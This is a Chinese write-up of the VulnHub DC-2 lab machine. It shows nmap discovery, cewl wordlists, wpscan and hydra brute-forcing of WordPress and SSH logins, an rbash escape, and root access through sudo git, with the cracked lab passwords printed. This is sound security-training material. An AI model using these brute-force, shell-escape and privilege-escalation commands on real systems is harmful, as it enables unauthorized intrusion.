欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

vulnhub之DC2靶机

程序员文章站 2022-05-17 10:29:15
...

文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

vulnhub之DC2靶机

靶机概览

详情介绍请参考下载地址
任务目标:拿下5个flag
下载地址:https://www.vulnhub.com/entry/dc-2,311/
靶机界面:
vulnhub之DC2靶机

信息收集

由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC2的MAC,这样做主机发现时可以通过MAC来过滤靶机。
vulnhub之DC2靶机

nmap信息收集

1:使用nmap作网段的主机发现,确定靶机地址是192.168.40.137
vulnhub之DC2靶机
2:继续使用nmap对靶机做进一步探测,发现靶机开启了80和7744(SSH)端口,先从80端口打开局面
vulnhub之DC2靶机
3:访问网站,发现URL栏写的不是靶机的ip,而是http://dc-2/,而很明显,DNS美哟解析出来
vulnhub之DC2靶机
4:回过头来注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件
vulnhub之DC2靶机
5:配置hosts文件
(1)kali修改hosts

sudo vim /etc/hosts

vulnhub之DC2靶机

(2)windows修改hosts

C:\Windows\System32\drivers\etc\hosts

6:再次访问网站
vulnhub之DC2靶机

网站信息收集

Flag1

登录网站直接拿到Flag1,页面给出了一些线索
vulnhub之DC2靶机
线索的大致意思如下
vulnhub之DC2靶机
cewl是个啥,百度一下,是一款以爬虫模式在指定URL上收集单词的工具,可以将它收集到的单词纳入密码字典,以提高密码**工具的成功率

爬站

试了一下,发现kali集成了cewl,那就直接干,生成的字典有239行vulnhub之DC2靶机

目录扫描

目录扫描的工具很多,由于靶机的网站页面是wordpress,所以选择wpscan来扫目录
1:先更新一下wpscan

wpscan --update

2:简单扫描一下

wpscan --url dc-2

好想没什么有价值的信息

列出站点的用户名、账号

wpscan换一种用法,列出站点的用户名、账号

wpscan --url dc-2 -e u

发现了3个账户
vulnhub之DC2靶机

渗透攻击

**后台

访问wordpress默认后台/wp-login.php,找到后台登录界面
vulnhub之DC2靶机
**的话需要用户名字典,很明显,就是admin,jerry和tom那三个用户,密码字典则是刚拿下flag1爬站时生成的pwd.dic字典,工具这里选择使用wpscan了
命令:

wpscan --url dc-2 -U user.txt -P pwd.dic

爆出了两个账户

Username: jerry, Password: adipiscing
Username: tom, Password: parturient

访问网站

登录tom没发现有意思的信息,登录jerry发现了有趣的信息
vulnhub之DC2靶机

Flag2

先来看一下flag,显示的是flag1的内容
vulnhub之DC2靶机
再来看一下flag2
vulnhub之DC2靶机

**ssh

使用如下命令,-s是指定端口,因为ssh端口被修改为7744

hydra -L user.txt -P pwd.dic ssh://192.168.40.137 -s 7744 -o hydra.ssh -vV

爆出了tom的密码

login: tom   password: parturient

登录ssh

注意,由于靶机的ssh不是22,所以需要指定端口

ssh aaa@qq.com -p 7744

发现了flag3,但是由于自己用的是rbash,所以无法使用cat命令,需要绕过rbash限制
vulnhub之DC2靶机

绕过rbash拿flag3

绕过rbash

BASH_CMDS[a]=/bin/sh;a
/bin/bash

添加环境变量

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

拿到flag3,现在线索引向了jerry,并提示使用su,拿就是切换用户啊
vulnhub之DC2靶机

拿下jerry拿下flag4

查看一下/etc/passwd确实看到了jerry,但是我们只有web下jerry的账户密码,而没有爆出靶机系统下jerry的账户密码,那只能拿web密码来蒙一下了。
vulnhub之DC2靶机
使用jerry的web密码adipiscing成功登入jerry的账户,并直接拿下flag4。根据提示,还剩最后一个flag,看这意思是需要进到root家,flag5极大概率在root家里,最后暗示了一下git
vulnhub之DC2靶机

提权

先查看一下自己能不能免密使用一些root级别的命令,恰好发现了git
vulnhub之DC2靶机

git提权

输入如下命令,会强制进入交互状态

sudo git -p --help

再调用bash

!/bin/bash

现在就能以root身份执行命令了

flag5

vulnhub之DC2靶机

相关标签: 靶机 web